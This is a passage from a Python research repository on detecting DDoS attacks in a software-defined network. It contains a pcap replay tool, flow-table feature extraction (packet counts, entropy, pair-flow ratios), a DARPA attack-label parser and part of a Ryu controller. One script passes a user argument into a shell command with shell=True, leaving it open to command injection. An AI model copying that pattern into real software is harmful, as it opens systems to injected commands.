(2*Num_Pair_flows)/float(len(IP_hashlist)) 81 | else: 82 | Num_Pair_flows = 0 83 | PPf = 0 84 | 85 | window_packetcount = len(window_packetcount_list) 86 | if (window_packetcount != 0): 87 | window_mean_packetcount = mean(window_packetcount_list) 88 | window_mean_bytescount = mean(window_bytescount_list) 89 | else: 90 | window_mean_packetcount = 0 91 | window_mean_bytescount = 0 92 | 93 | if (len(window_IP_hashlist) != 0): 94 | window_Num_Pair_flows = len(window_IP_hashlist) - len(window_Pair_IP_hashlist) 95 | windowPPf = (2*window_Num_Pair_flows)/float(len(window_IP_hashlist)) 96 | else: 97 | window_Num_Pair_flows = 0 98 | windowPPf = 0 99 | 100 | # entropy 101 | dstIP_counter_list = dst_IP_counter.values() 102 | for value in dstIP_counter_list: 103 | dstIP_probability_list.append(value/float(packetcount)) 104 | window_dstIP_counter_list = window_dst_IP_counter.values() 105 | for value in window_dstIP_counter_list: 106 | window_dstIP_probability_list.append(value/float(window_packetcount)) 107 | 108 | for value in dstIP_probability_list: 109 | entropy_list.append(value * log(value, 2)) 110 | for value in window_dstIP_probability_list: 111 | window_entropy_list.append(value * log(value, 2)) 112 | entropy = -sum(entropy_list) 113 | window_entropy = -sum(window_entropy_list) 114 | 115 | if (packetcount == 0): 116 | packet_count_ratio = 0 117 | else: 118 | packet_count_ratio = (window_packetcount/float(packetcount)) 119 | 120 | if (mean_packetcount == 0): 121 | mean_ratio = 0 122 | else: 123 | mean_ratio = window_mean_packetcount/mean_packetcount 124 | 125 | if (mean_bytescount == 0): 126 | mean_ratio = 0 127 | else: 128 | mean_ratio = window_mean_bytescount/mean_bytescount 129 | 130 | print("%65s" % "1. Packet count") 131 | print("%40s %40s" % ("all packet count: ", str(packetcount))) 132 | print("%40s %40s" % ("window's packet count: ", str(window_packetcount))) 133 | print("%40s %40s" % ("packet count ratio: ", str(packet_count_ratio))) 134 | 135 | print("%65s" % "2. Packet Mean") 136 | print("%40s %40s" % ("mean of all packet count: ", str(mean_packetcount))) 137 | print("%40s %40s" % ("mean of window's packet count: ", str(window_mean_packetcount))) 138 | print("%40s %40s" % ("packet mean ratio: ", str(mean_ratio))) 139 | 140 | print("%65s" % "3. Bytes Mean") 141 | print("%40s %40s" % ("mean of all bytes count: ", str(mean_bytescount))) 142 | print("%40s %40s" % ("mean of window's bytes count: ", str(window_mean_bytescount))) 143 | print("%40s %40s" % ("bytes mean ratio: ", str(mean_ratio))) 144 | 145 | if (PPf != 0): 146 | PPf_ratio = windowPPf/PPf 147 | else: 148 | PPf_ratio = 0 149 | 150 | if (entropy != 0): 151 | entropy_ratio = window_entropy/entropy 152 | else: 153 | entropy_ratio = 0 154 | 155 | print("%65s" % "4. Percentage of Pair-Flow") 156 | print("%40s %40s" % ("pair-flow: ", str(Num_Pair_flows))) 157 | print("%40s %40s" % ("flow: ", str(len(IP_hashlist)))) 158 | print("%40s %40s" % ("window's pair-flow: ", str(window_Num_Pair_flows))) 159 | print("%40s %40s" % ("window's flow: ", str(len(window_IP_hashlist)))) 160 | print("%40s %40s" % ("percentage of all pair-flow: ", str(PPf))) 161 | print("%40s %40s" % ("percentage of window's pair-flow: ", str( windowPPf))) 162 | print("%40s %40s" % ("pair-flow ratio: ", str(PPf_ratio))) 163 | 164 | print("%65s" % "5. Entropy") 165 | print("%40s %40s" % ("dst IP counter list: ", dstIP_counter_list)) 166 | print("%40s %40s" % ("window's dst IP counter list: ", window_dstIP_counter_list)) 167 | print("%40s %40s" % ("entropy: ", entropy)) 168 | print("%40s %40s" % ("window's entropy: ", window_entropy)) 169 | print("%40s %40s" % ("entropy ratio: ", str(entropy_ratio))) 170 | 171 | 172 | def main(): 173 | if len(sys.argv) != 2: 174 | print "Usage : %s " % sys.argv[0] 175 | sys.exit(1) 176 | 177 | filename = sys.argv[1] 178 | command = "find " + filename +" -iname 'new_file*' -printf \"%T@ %Tc %p\n\" | sort -n | awk '{print $7}'" 179 | paths = subprocess.check_output(command, shell=True).splitlines() 180 | print(paths) 181 | 182 | interval = 10 183 | interface = "h0-eth0" 184 | datapath = "s0" 185 | secsdelta = timedelta(seconds=interval) 186 | 187 | for i, path in enumerate(paths, start=0): 188 | packets = rdpcap(path) 189 | print("%d read pcap %s completed." % (i, path)) 190 | 191 | # the first iteration 192 | if (i == 0): 193 | # init timestamp 194 | interval_timestamp = datetime.fromtimestamp(packets[0].time) 195 | #.strftime('%Y-%m-%d_%H-%M-%S') 196 | print("start with: " + interval_timestamp.strftime('%Y-%m-%d_%H-%M-%S')) 197 | interval_timestamp = interval_timestamp + secsdelta 198 | # print(interval_timestamp.strftime('%Y-%m-%d_%H-%M-%S')) 199 | 200 | for packet in packets: 201 | packet_timestamp = datetime.fromtimestamp(packet.time) 202 | if packet_timestamp < interval_timestamp: 203 | # print(packet_timestamp.strftime('%Y-%m-%d_%H-%M-%S')) 204 | # specify interface 205 | sendp(packet, iface=interface, verbose=0) 206 | else: 207 | print("[PRINT FLOW TABLE] %s" % interval_timestamp) 208 | line = subprocess.check_output(['sudo', 'ovs-ofctl', 'dump-flows', datapath, '-O', 'OpenFlow13']) 209 | filename = packet_timestamp.strftime('%Y-%m-%d_%H-%M-%S') 210 | print(packet_timestamp.strftime('%Y-%m-%d_%H-%M-%S')) 211 | 212 | data_analysis(line) 213 | # filename = "data/" + filename 214 | # flow_table_log = open(filename, "w") 215 | # flow_table_log.write(line[2:]) 216 | # flow_table_log.close() 217 | 218 | interval_timestamp = interval_timestamp + secsdelta 219 | print("Add 10 secs") 220 | print(packet_timestamp.strftime('%Y-%m-%d_%H-%M-%S')) 221 | sendp(packet, iface=interface, verbose=0) 222 | 223 | #print(packet_timestamp) 224 | # datapath = "s0" 225 | # line = subprocess.check_output(['sudo', 'ovs-ofctl', 'dump-flows', datapath, '-O', 'OpenFlow13']) 226 | # current_time = datetime.now().strftime('%H:%M:%S') 227 | 228 | # print(current_time) 229 | 230 | 231 | # def find_all(name, path): 232 | # reselt = [] 233 | # for root, dirs, files in os.walk(path): 234 | # if name in files: 235 | # result.append(os.path.join(root, name)) 236 | # return result 237 | 238 | if __name__ == "__main__": 239 | main() 240 | -------------------------------------------------------------------------------- /ryu/monitor.py: -------------------------------------------------------------------------------- 1 | 2 | from scapy.all import * 3 | from datetime import datetime 4 | import sys 5 | import subprocess 6 | from datetime import datetime 7 | from datetime import timedelta 8 | from collections import Counter 9 | from math import log 10 | from numpy import median 11 | from numpy import mean 12 | 13 | def main(): 14 | datapath = "s0" 15 | while 1: 16 | lines = subprocess.check_output(['sudo', 'ovs-ofctl', 'dump-flows', datapath, '-O', 'OpenFlow13']) 17 | 18 | 19 | 20 | 21 | lines = lines.splitlines() 22 | packetcount_list = [] 23 | bytescount_list = [] 24 | dst_IP_counter = Counter() 25 | Pair_IP_hashlist = set() 26 | IP_hashlist = set() 27 | 28 | # window = 10s 29 | window = 10 30 | window_packetcount_list = [] 31 | window_bytescount_list = [] 32 | window_dst_IP_counter = Counter() 33 | window_Pair_IP_hashlist = set() 34 | window_IP_hashlist = set() 35 | 36 | dstIP_probability_list = [] 37 | window_dstIP_probability_list = [] 38 | entropy_list = [] 39 | window_entropy_list = [] 40 | 41 | for line in lines: 42 | 43 | 44 | line = line.split(",") 45 | # print(line) 46 | 47 | # exception killing 48 | if (line[0][0:10] == "OFPST_FLOW"): 49 | continue 50 | if (line[5][0:9] == " priority"): 51 | continue 52 | 53 | 54 | if (line[6] == " priority=3"): 55 | 56 | duration = float(line[1][10:-1]) 57 | packet_count = int(line[3][11:]) 58 | byte_count = int(line[4][9:]) 59 | src_IP = line[8][7:] 60 | dst_IP = line[9][7:] 61 | 62 | flow_IP = src_IP, dst_IP 63 | sorted_flow_IP = tuple(sorted(flow_IP)) 64 | # print(sorted_flow_IP) 65 | 66 | # packetcount_list.append(packet_count) 67 | # bytescount_list.append(byte_count) 68 | # Pair_IP_hashlist.add(hash(sorted_flow_IP)) 69 | # IP_hashlist.add(hash(flow_IP)) 70 | 71 | # dst_IP_counter[dst_IP] += 1 72 | 73 | if (duration - window <= 0): 74 | window_packetcount_list.append(packet_count) 75 | window_bytescount_list.append(byte_count) 76 | window_Pair_IP_hashlist.add(hash(sorted_flow_IP)) 77 | window_IP_hashlist.add(hash(flow_IP)) 78 | window_dst_IP_counter[dst_IP] += 1 79 | else: 80 | packetcount_list.append(packet_count) 81 | bytescount_list.append(byte_count) 82 | Pair_IP_hashlist.add(hash(sorted_flow_IP)) 83 | IP_hashlist.add(hash(flow_IP)) 84 | dst_IP_counter[dst_IP] += 1 85 | 86 | 87 | packetcount = len(packetcount_list) 88 | if (packetcount != 0): 89 | mean_packetcount = mean(packetcount_list) 90 | mean_bytescount = mean(bytescount_list) 91 | median_packetcount = median(packetcount_list) 92 | median_bytescount = median(bytescount_list) 93 | else: 94 | mean_packetcount = 0 95 | mean_bytescount = 0 96 | median_packetcount = 0 97 | median_bytescount = 0 98 | 99 | 100 | window_packetcount = len(window_packetcount_list) 101 | if (window_packetcount != 0): 102 | window_mean_packetcount = mean(window_packetcount_list) 103 | window_mean_bytescount = mean(window_bytescount_list) 104 | window_median_packetcount = median(window_packetcount_list) 105 | window_median_bytescount = median(window_bytescount_list) 106 | else: 107 | window_mean_packetcount = 0 108 | window_mean_bytescount = 0 109 | window_median_packetcount = 0 110 | window_median_bytescount = 0 111 | 112 | if (len(IP_hashlist) != 0): 113 | Num_Pair_flows = len(IP_hashlist) - len(Pair_IP_hashlist) 114 | PPf = (2*Num_Pair_flows)/float(len(IP_hashlist)) 115 | else: 116 | Num_Pair_flows = 0 117 | PPf = 0 118 | 119 | if (len(window_IP_hashlist) != 0): 120 | window_Num_Pair_flows = len(window_IP_hashlist) - len(window_Pair_IP_hashlist) 121 | windowPPf = (2*window_Num_Pair_flows)/float(len(window_IP_hashlist)) 122 | else: 123 | window_Num_Pair_flows = 0 124 | windowPPf = 0 125 | 126 | # entropy 127 | dstIP_counter_list = dst_IP_counter.values() 128 | for value in dstIP_counter_list: 129 | dstIP_probability_list.append(value/float(packetcount)) 130 | window_dstIP_counter_list = window_dst_IP_counter.values() 131 | for value in window_dstIP_counter_list: 132 | window_dstIP_probability_list.append(value/float(window_packetcount)) 133 | 134 | for value in dstIP_probability_list: 135 | entropy_list.append(value * log(value, 2)) 136 | for value in window_dstIP_probability_list: 137 | window_entropy_list.append(value * log(value, 2)) 138 | entropy = -sum(entropy_list) 139 | window_entropy = -sum(window_entropy_list) 140 | 141 | if (packetcount == 0): 142 | packet_count_ratio = 1 143 | else: 144 | packet_count_ratio = window_packetcount / float(packetcount) 145 | 146 | if (mean_packetcount == 0): 147 | packet_mean_ratio = 0 148 | else: 149 | packet_mean_ratio = window_mean_packetcount / mean_packetcount 150 | 151 | if (median_packetcount == 0): 152 | packet_median_ratio = 0 153 | else: 154 | packet_median_ratio = window_median_packetcount/median_packetcount 155 | 156 | if (mean_bytescount == 0): 157 | bytes_mean_ratio = 0 158 | else: 159 | bytes_mean_ratio = window_mean_bytescount/mean_bytescount 160 | 161 | if (median_bytescount == 0): 162 | bytes_median_ratio = 0 163 | else: 164 | bytes_median_ratio = window_median_bytescount/median_bytescount 165 | 166 | if (window_packetcount) != 0: 167 | dis_mean_packetcount = abs(mean_packetcount - window_mean_packetcount) 168 | dis_median_packetcount = abs(median_packetcount - window_median_packetcount) 169 | dis_mean_bytescount = abs(mean_bytescount - window_mean_bytescount) 170 | dis_median_bytescount = abs(median_bytescount - window_median_bytescount) 171 | dis_PPf = abs(PPf - windowPPf) 172 | dis_entropy = abs(entropy - window_entropy) 173 | else: 174 | dis_mean_packetcount = 0 175 | dis_median_packetcount = 0 176 | dis_mean_bytescount = 0 177 | dis_mean_bytescount = 0 178 | dis_median_bytescount = 0 179 | dis_PPf = 0 180 | dis_entropy = 0 181 | 182 | feature_list = [] 183 | 184 | print("%65s" % "1. Packet count") 185 | print("%40s %40s" % ("all packet count: ", str(packetcount))) 186 | feature_list.append(packetcount) 187 | print("%40s %40s" % ("window's packet count: ", str(window_packetcount))) 188 | feature_list.append(window_packetcount) 189 | print("%40s %40s" % ("packet count ratio: ", str(packet_count_ratio))) 190 | feature_list.append(packet_count_ratio) 191 | 192 | print("%65s" % "2. Packet Mean & Median") 193 | print("%40s %40s" % ("mean of all packet count: ", str(mean_packetcount))) 194 | feature_list.append(mean_packetcount) 195 | print("%40s %40s" % ("mean of window's packet count: ", str(window_mean_packetcount))) 196 | feature_list.append(window_mean_packetcount) 197 | print("%40s %40s" % ("packet mean ratio: ", str(packet_mean_ratio))) 198 | feature_list.append(packet_mean_ratio) 199 | print("%40s %40s" % ("relative distance: ", str(dis_mean_packetcount))) 200 | feature_list.append(dis_mean_packetcount) 201 | print("%40s %40s" % ("median of all packet count: ", str(median_packetcount))) 202 | feature_list.append(median_packetcount) 203 | print("%40s %40s" % ("median of window's packet count: ", str(window_median_packetcount))) 204 | feature_list.append(window_median_packetcount) 205 | print("%40s %40s" % ("packet median ratio: ", str(packet_median_ratio))) 206 | feature_list.append(packet_median_ratio) 207 | print("%40s %40s" % ("relative distance: ", str(dis_median_packetcount))) 208 | feature_list.append(dis_median_packetcount) 209 | 210 | print("%65s" % "3. Bytes Mean & Median") 211 | print("%40s %40s" % ("mean of all bytes count: ", str(mean_bytescount))) 212 | feature_list.append(mean_bytescount) 213 | print("%40s %40s" % ("mean of window's bytes count: ", str(window_mean_bytescount))) 214 | feature_list.append(window_mean_bytescount) 215 | print("%40s %40s" % ("bytes mean ratio: ", str(bytes_mean_ratio))) 216 | feature_list.append(bytes_mean_ratio) 217 | print("%40s %40s" % ("relative distance: ", str(dis_mean_bytescount))) 218 | feature_list.append(dis_mean_bytescount) 219 | print("%40s %40s" % ("median of all bytes count: ", str(median_bytescount))) 220 | feature_list.append(median_bytescount) 221 | print("%40s %40s" % ("median of window's bytes count: ", str(window_median_bytescount))) 222 | feature_list.append(window_median_bytescount) 223 | print("%40s %40s" % ("bytes median ratio: ", str(bytes_median_ratio))) 224 | feature_list.append(bytes_median_ratio) 225 | print("%40s %40s" % ("relative distance: ", str(dis_median_bytescount))) 226 | feature_list.append(dis_median_bytescount) 227 | 228 | if (PPf != 0): 229 | PPf_ratio = windowPPf/PPf 230 | else: 231 | PPf_ratio = 0 232 | 233 | if (entropy != 0): 234 | entropy_ratio = window_entropy/entropy 235 | else: 236 | entropy_ratio = 0 237 | 238 | print("%65s" % "4. Percentage of Pair-Flow") 239 | print("%40s %40s" % ("pair-flow: ", str(Num_Pair_flows))) 240 | feature_list.append(Num_Pair_flows) 241 | print("%40s %40s" % ("flow: ", str(len(IP_hashlist)))) 242 | feature_list.append(len(IP_hashlist)) 243 | print("%40s %40s" % ("window's pair-flow: ", str(window_Num_Pair_flows))) 244 | feature_list.append(window_Num_Pair_flows) 245 | print("%40s %40s" % ("window's flow: ", str(len(window_IP_hashlist)))) 246 | feature_list.append(len(window_IP_hashlist)) 247 | print("%40s %40s" % ("percentage of all pair-flow: ", str(PPf))) 248 | feature_list.append(PPf) 249 | print("%40s %40s" % ("percentage of window's pair-flow: ", str(windowPPf))) 250 | feature_list.append(windowPPf) 251 | print("%40s %40s" % ("pair-flow ratio: ", str(PPf_ratio))) 252 | feature_list.append(PPf_ratio) 253 | print("%40s %40s" % ("relative distance: ", str(dis_PPf))) 254 | feature_list.append(dis_PPf) 255 | 256 | 257 | print("%65s" % "5. Entropy") 258 | # print("%40s %40s" % ("dst IP counter list: ", dstIP_counter_list)) 259 | # print("%40s %40s" % ("window's dst IP counter list: ", window_dstIP_counter_list)) 260 | print("%40s %40s" % ("entropy: ", entropy)) 261 | feature_list.append(entropy) 262 | print("%40s %40s" % ("window's entropy: ", window_entropy)) 263 | feature_list.append(window_entropy) 264 | print("%40s %40s" % ("entropy ratio: ", str(entropy_ratio))) 265 | feature_list.append(entropy_ratio) 266 | print("%40s %40s" % ("relative distance: ", str(dis_entropy))) 267 | feature_list.append(dis_entropy) 268 | 269 | print_buffer = ''.join( (str(e) + "\n") for e in feature_list) 270 | # print(print_buffer) 271 | current_time = datetime.now().strftime('%m%d_%H%M%S') 272 | filename = "data/" + current_time 273 | flow_table_log = open(filename, "w+") 274 | flow_table_log.write(print_buffer) 275 | flow_table_log.close() 276 | 277 | time.sleep(10) 278 | 279 | 280 | 281 | if __name__ == "__main__": 282 | main() -------------------------------------------------------------------------------- /darpa/attack_analysis.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # THIS SCRIPT IS A PIECE OF SHIT 3 | 4 | import sys 5 | from datetime import datetime 6 | from datetime import timedelta 7 | import csv 8 | import os 9 | 10 | week = str 11 | day = str 12 | csvfile = object 13 | writer = object 14 | 15 | def main(): 16 | if len(sys.argv) != 2: 17 | print "Usage : %s " % sys.argv[0] 18 | sys.exit(1) 19 | 20 | filename = sys.argv[1] 21 | global day 22 | day = os.path.basename(filename[:-5]) 23 | global week 24 | week = os.path.basename(os.path.dirname(filename))[5:] 25 | 26 | global f 27 | csvfile = open("attacklog.csv", 'a+') 28 | global writer 29 | writer = csv.writer(csvfile) 30 | 31 | file2 = [] 32 | with open(filename) as f: 33 | file = f.read().splitlines() 34 | 35 | i = 0 36 | while i < len(file): 37 | line_element = file[i].split() 38 | if (line_element[10] == "back"): 39 | file2.append(" ".join(str(item) for item in line_element)) 40 | 41 | if (line_element[10] == "land"): 42 | file2.append(" ".join(str(item) for item in line_element)) 43 | 44 | if (line_element[10] == "neptune"): 45 | file2.append(" ".join(str(item) for item in line_element)) 46 | 47 | if (line_element[10] == "pod"): 48 | file2.append(" ".join(str(item) for item in line_element)) 49 | 50 | if (line_element[10] == "smurf"): 51 | file2.append(" ".join(str(item) for item in line_element)) 52 | 53 | if (line_element[10] == "syslog"): 54 | file2.append(" ".join(str(item) for item in line_element)) 55 | 56 | if (line_element[10] == "teardrop"): 57 | file2.append(" ".join(str(item) for item in line_element)) 58 | 59 | i = i + 1 60 | 61 | 62 | # print(file2) 63 | file2.append("0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0") 64 | i = 0 65 | while i < len(file2): 66 | if (i == len(file2)-1): 67 | line_element = file2[i].split() 68 | # print(line_element) 69 | else: 70 | line_element = file2[i].split() 71 | if (line_element[10] == "back"): 72 | # print(line_element) 73 | duration = datetime.strptime(line_element[3], "%H:%M:%S") 74 | delta = timedelta( 75 | hours=duration.hour, minutes=duration.minute, seconds=duration.second) 76 | start_time = datetime.strptime(line_element[2], "%H:%M:%S") 77 | end_time = start_time + delta 78 | # print(start_time) 79 | first_line_element = line_element 80 | i = i + 1 81 | line_element = file2[i].split() 82 | while (line_element[10] == "back"): 83 | # print("find") 84 | duration_new = datetime.strptime( 85 | line_element[3], "%H:%M:%S") 86 | delta_new = timedelta( 87 | hours=duration_new.hour, minutes=duration_new.minute, seconds=duration_new.second) 88 | start_time_new = datetime.strptime( 89 | line_element[2], "%H:%M:%S") 90 | end_time_new = start_time_new + delta_new 91 | 92 | 93 | 94 | if (end_time_new > end_time): 95 | end_time = end_time_new 96 | 97 | # print(end_time_new) 98 | 99 | i = i + 1 100 | line_element = file2[i].split() 101 | 102 | first_line_element.insert(0, week) 103 | first_line_element.insert(1, day) 104 | end_time_str = (end_time.strftime("%H:%M:%S")) 105 | first_line_element.insert(5, end_time_str) 106 | del first_line_element[2] 107 | del first_line_element[5:12] 108 | i = i - 1 109 | writer.writerow(first_line_element) 110 | 111 | if (line_element[10] == "land"): 112 | duration = datetime.strptime(line_element[3], "%H:%M:%S") 113 | delta = timedelta( 114 | hours=duration.hour, minutes=duration.minute, seconds=duration.second) 115 | start_time = datetime.strptime(line_element[2], "%H:%M:%S") 116 | end_time = start_time + delta 117 | first_line_element = line_element 118 | i = i + 1 119 | line_element = file2[i].split() 120 | while (line_element[10] == "land"): 121 | duration_new = datetime.strptime( 122 | line_element[3], "%H:%M:%S") 123 | delta_new = timedelta( 124 | hours=duration_new.hour, minutes=duration_new.minute, seconds=duration_new.second) 125 | start_time_new = datetime.strptime( 126 | line_element[2], "%H:%M:%S") 127 | end_time_new = start_time_new + delta_new 128 | # print(end_time_new) 129 | 130 | if (end_time_new > end_time): 131 | end_time = end_time_new 132 | 133 | i = i + 1 134 | line_element = file2[i].split() 135 | 136 | first_line_element.insert(0, week) 137 | first_line_element.insert(1, day) 138 | end_time_str = (end_time.strftime("%H:%M:%S")) 139 | first_line_element.insert(5, end_time_str) 140 | del first_line_element[2] 141 | del first_line_element[5:12] 142 | i = i - 1 143 | writer.writerow(first_line_element) 144 | 145 | if (line_element[10] == "neptune"): 146 | duration = datetime.strptime(line_element[3], "%H:%M:%S") 147 | delta = timedelta( 148 | hours=duration.hour, minutes=duration.minute, seconds=duration.second) 149 | start_time = datetime.strptime(line_element[2], "%H:%M:%S") 150 | end_time = start_time + delta 151 | 152 | first_line_element = line_element 153 | i = i + 1 154 | line_element = file2[i].split() 155 | while (line_element[10] == "neptune"): 156 | duration_new = datetime.strptime( 157 | line_element[3], "%H:%M:%S") 158 | delta_new = timedelta( 159 | hours=duration_new.hour, minutes=duration_new.minute, seconds=duration_new.second) 160 | start_time_new = datetime.strptime( 161 | line_element[2], "%H:%M:%S") 162 | end_time_new = start_time_new + delta_new 163 | # print(end_time_new) 164 | 165 | if (end_time_new > end_time): 166 | end_time = end_time_new 167 | 168 | i = i + 1 169 | line_element = file2[i].split() 170 | 171 | first_line_element.insert(0, week) 172 | first_line_element.insert(1, day) 173 | end_time_str = (end_time.strftime("%H:%M:%S")) 174 | first_line_element.insert(5, end_time_str) 175 | del first_line_element[2] 176 | del first_line_element[5:12] 177 | i = i - 1 178 | writer.writerow(first_line_element) 179 | 180 | if (line_element[10] == "pod"): 181 | duration = datetime.strptime(line_element[3], "%H:%M:%S") 182 | delta = timedelta( 183 | hours=duration.hour, minutes=duration.minute, seconds=duration.second) 184 | start_time = datetime.strptime(line_element[2], "%H:%M:%S") 185 | end_time = start_time + delta 186 | 187 | first_line_element = line_element 188 | i = i + 1 189 | line_element = file2[i].split() 190 | while (line_element[10] == "pod"): 191 | duration_new = datetime.strptime( 192 | line_element[3], "%H:%M:%S") 193 | delta_new = timedelta( 194 | hours=duration_new.hour, minutes=duration_new.minute, seconds=duration_new.second) 195 | start_time_new = datetime.strptime( 196 | line_element[2], "%H:%M:%S") 197 | end_time_new = start_time_new + delta_new 198 | # print(end_time_new) 199 | 200 | if (end_time_new > end_time): 201 | end_time = end_time_new 202 | 203 | i = i + 1 204 | line_element = file2[i].split() 205 | 206 | first_line_element.insert(0, week) 207 | first_line_element.insert(1, day) 208 | end_time_str = (end_time.strftime("%H:%M:%S")) 209 | first_line_element.insert(5, end_time_str) 210 | del first_line_element[2] 211 | del first_line_element[5:12] 212 | i = i - 1 213 | writer.writerow(first_line_element) 214 | 215 | if (line_element[10] == "smurf"): 216 | duration = datetime.strptime(line_element[3], "%H:%M:%S") 217 | delta = timedelta( 218 | hours=duration.hour, minutes=duration.minute, seconds=duration.second) 219 | start_time = datetime.strptime(line_element[2], "%H:%M:%S") 220 | end_time = start_time + delta 221 | 222 | first_line_element = line_element 223 | i = i + 1 224 | line_element = file2[i].split() 225 | while (line_element[10] == "smurf"): 226 | duration_new = datetime.strptime( 227 | line_element[3], "%H:%M:%S") 228 | delta_new = timedelta( 229 | hours=duration_new.hour, minutes=duration_new.minute, seconds=duration_new.second) 230 | start_time_new = datetime.strptime( 231 | line_element[2], "%H:%M:%S") 232 | end_time_new = start_time_new + delta_new 233 | # print(end_time_new) 234 | 235 | if (end_time_new > end_time): 236 | end_time = end_time_new 237 | 238 | i = i + 1 239 | line_element = file2[i].split() 240 | 241 | first_line_element.insert(0, week) 242 | first_line_element.insert(1, day) 243 | end_time_str = (end_time.strftime("%H:%M:%S")) 244 | first_line_element.insert(5, end_time_str) 245 | del first_line_element[2] 246 | del first_line_element[5:12] 247 | i = i - 1 248 | writer.writerow(first_line_element) 249 | 250 | if (line_element[10] == "syslog"): 251 | duration = datetime.strptime(line_element[3], "%H:%M:%S") 252 | delta = timedelta( 253 | hours=duration.hour, minutes=duration.minute, seconds=duration.second) 254 | start_time = datetime.strptime(line_element[2], "%H:%M:%S") 255 | end_time = start_time + delta 256 | 257 | first_line_element = line_element 258 | i = i + 1 259 | line_element = file2[i].split() 260 | while (line_element[10] == "syslog"): 261 | duration_new = datetime.strptime( 262 | line_element[3], "%H:%M:%S") 263 | delta_new = timedelta( 264 | hours=duration_new.hour, minutes=duration_new.minute, seconds=duration_new.second) 265 | start_time_new = datetime.strptime( 266 | line_element[2], "%H:%M:%S") 267 | end_time_new = start_time_new + delta_new 268 | # print(end_time_new) 269 | 270 | if (end_time_new > end_time): 271 | end_time = end_time_new 272 | 273 | i = i + 1 274 | line_element = file2[i].split() 275 | 276 | first_line_element.insert(0, week) 277 | first_line_element.insert(1, day) 278 | end_time_str = (end_time.strftime("%H:%M:%S")) 279 | first_line_element.insert(5, end_time_str) 280 | del first_line_element[2] 281 | del first_line_element[5:12] 282 | i = i - 1 283 | writer.writerow(first_line_element) 284 | 285 | if (line_element[10] == "teardrop"): 286 | duration = datetime.strptime(line_element[3], "%H:%M:%S") 287 | delta = timedelta( 288 | hours=duration.hour, minutes=duration.minute, seconds=duration.second) 289 | start_time = datetime.strptime(line_element[2], "%H:%M:%S") 290 | end_time = start_time + delta 291 | 292 | first_line_element = line_element 293 | i = i + 1 294 | line_element = file2[i].split() 295 | while (line_element[10] == "teardrop"): 296 | duration_new = datetime.strptime( 297 | line_element[3], "%H:%M:%S") 298 | delta_new = timedelta( 299 | hours=duration_new.hour, minutes=duration_new.minute, seconds=duration_new.second) 300 | start_time_new = datetime.strptime( 301 | line_element[2], "%H:%M:%S") 302 | end_time_new = start_time_new + delta_new 303 | # print(end_time_new) 304 | 305 | if (end_time_new > end_time): 306 | end_time = end_time_new 307 | 308 | i = i + 1 309 | line_element = file2[i].split() 310 | 311 | first_line_element.insert(0, week) 312 | first_line_element.insert(1, day) 313 | end_time_str = (end_time.strftime("%H:%M:%S")) 314 | first_line_element.insert(5, end_time_str) 315 | del first_line_element[2] 316 | del first_line_element[5:12] 317 | i = i - 1 318 | writer.writerow(first_line_element) 319 | 320 | # writer.writerow(first_line_element) 321 | 322 | # print(line_element[2]) 323 | i = i + 1 324 | 325 | if __name__ == "__main__": 326 | main() 327 | -------------------------------------------------------------------------------- /ryu/app_realtime.py: -------------------------------------------------------------------------------- 1 | from ryu.base import app_manager 2 | from ryu.controller import ofp_event 3 | from ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER, DEAD_DISPATCHER 4 | from ryu.controller.handler import set_ev_cls 5 | from ryu.ofproto import ofproto_v1_3 6 | from ryu.lib.packet import ipv4 7 | from ryu.lib.packet import packet 8 | from ryu.lib.packet import ethernet 9 | from ryu.lib.packet import ether_types 10 | from ryu.lib.packet import tcp 11 | from ryu.lib.packet import udp 12 | from ryu.lib.packet import arp 13 | from ryu.lib import hub 14 | import json 15 | 16 | from collections import Counter 17 | from math import log 18 | from numpy import median 19 | from numpy import mean 20 | 21 | class Controller(app_manager.RyuApp): 22 | OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION] 23 | 24 | def __init__(self, *args, **kwargs): 25 | super(Controller, self).__init__(*args, **kwargs) 26 | self.mac_to_port = {} 27 | self.datapaths = {} 28 | self.monitor_thread = hub.spawn(self._monitor) 29 | self.packets_per_flow_list = [] 30 | 31 | 32 | 33 | # SwitchFeatures packet handler 34 | @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER) 35 | def _switch_features_handler(self, ev): 36 | datapath = ev.msg.datapath 37 | ofproto = datapath.ofproto 38 | parser = datapath.ofproto_parser 39 | match = parser.OFPMatch() 40 | actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER, 41 | ofproto.OFPCML_NO_BUFFER)] 42 | # Add default flow 43 | self.add_flow(datapath, 0, 0, match, actions) 44 | 45 | # let UDP through controller 46 | # match = parser.OFPMatch(eth_type=0x0800, ip_proto=0x11) 47 | # self.add_flow(datapath, 2, match, actions) 48 | 49 | 50 | # StateChange packet handler 51 | @set_ev_cls(ofp_event.EventOFPStateChange, [MAIN_DISPATCHER, DEAD_DISPATCHER]) 52 | def _state_change_handler(self, ev): 53 | datapath = ev.datapath 54 | if ev.state == MAIN_DISPATCHER: 55 | if datapath.id not in self.datapaths: 56 | self.logger.info('register datapath: %016x', datapath.id) 57 | self.datapaths[datapath.id] = datapath 58 | elif ev.state == DEAD_DISPATCHER: 59 | if datapath.id in self.datapaths: 60 | self.logger.info('unregister datapath: %016x', datapath.id) 61 | del self.datapaths[datapath.id] 62 | 63 | # FlowStatsReply packet handler 64 | @set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER) 65 | def _flow_stats_reply_handler(self, ev): 66 | body = ev.msg.body 67 | self.logger.info("This is %016x EventOFPFlowStatsReply.", ev.msg.datapath.id) 68 | # self.logger.info('%s', json.dumps(ev.msg.to_jsondict(), ensure_ascii=True, 69 | # indent=3, sort_keys=True)) 70 | 71 | packetcount_list = [] 72 | bytescount_list = [] 73 | dst_IP_counter = Counter() 74 | Pair_IP_hashlist = set() 75 | IP_hashlist = set() 76 | 77 | # window = 10s 78 | window = 10 79 | window_packetcount_list = [] 80 | window_bytescount_list = [] 81 | window_dst_IP_counter = Counter() 82 | window_Pair_IP_hashlist = set() 83 | window_IP_hashlist = set() 84 | 85 | dstIP_probability_list = [] 86 | window_dstIP_probability_list = [] 87 | entropy_list = [] 88 | window_entropy_list = [] 89 | 90 | for stat in sorted([flow for flow in body if (flow.priority == 3)]): 91 | 92 | # self.logger.info('%s', json.dumps(ev.msg.to_jsondict(), ensure_ascii=True, indent=3, 